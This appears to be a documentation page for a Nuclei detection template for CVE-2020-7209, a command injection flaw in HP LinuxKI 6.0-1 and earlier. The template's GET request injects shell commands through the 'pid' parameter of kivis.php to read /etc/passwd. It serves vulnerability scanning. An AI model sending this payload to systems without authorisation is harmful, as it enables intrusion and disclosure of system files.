LinuxKI Toolset <= 6.01 - Remote Command Execution
ID: CVE-2020-7209
Severity: critical
Author: dwisiswant0
Tags: cve,cve2020,rce,packetstorm,hp
Description
Section titled “Description”LinuxKI v6.0-1 and earlier are vulnerable to remote code execution.
YAML Source
Section titled “YAML Source”id: CVE-2020-7209
info: name: LinuxKI Toolset <= 6.01 - Remote Command Execution author: dwisiswant0 severity: critical description: LinuxKI v6.0-1 and earlier are vulnerable to remote code execution. impact: | Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: This is resolved in release 6.0-2. reference: - http://packetstormsecurity.com/files/157739/HP-LinuxKI-6.01-Remote-Command-Injection.html - http://packetstormsecurity.com/files/158025/LinuxKI-Toolset-6.01-Remote-Command-Execution.html - https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-2 - https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 - https://www.hpe.com/us/en/home.html - https://nvd.nist.gov/vuln/detail/CVE-2020-7209 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-7209 epss-score: 0.97227 epss-percentile: 0.99837 cpe: cpe:2.3:a:hp:linuxki:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: hp product: linuxki tags: cve,cve2020,rce,packetstorm,hp
http: - method: GET path: - "{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;"
matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:"# digest: 4a0a004730450220627fcaa31236a9157290701aad4d102b6a1e247c8af543c0ef0306f85e92df92022100881dc34825712ae8b727cc16aa6a7575e49efe30313e7c7320b8f20e8e0f7720:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-7209.yaml"